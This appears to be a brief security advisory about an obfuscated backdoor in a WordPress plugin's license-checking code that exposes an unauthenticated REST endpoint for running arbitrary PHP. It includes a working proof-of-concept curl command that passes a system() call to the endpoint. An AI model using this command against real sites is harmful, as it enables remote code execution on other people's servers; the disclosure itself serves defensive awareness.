The plugin contains an obfuscated backdoor injected in it’s license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
curl -d ‘blowfish=1’ -d “blowf=system(‘id’);” ‘https://examples.com/wp-json/am-member/license’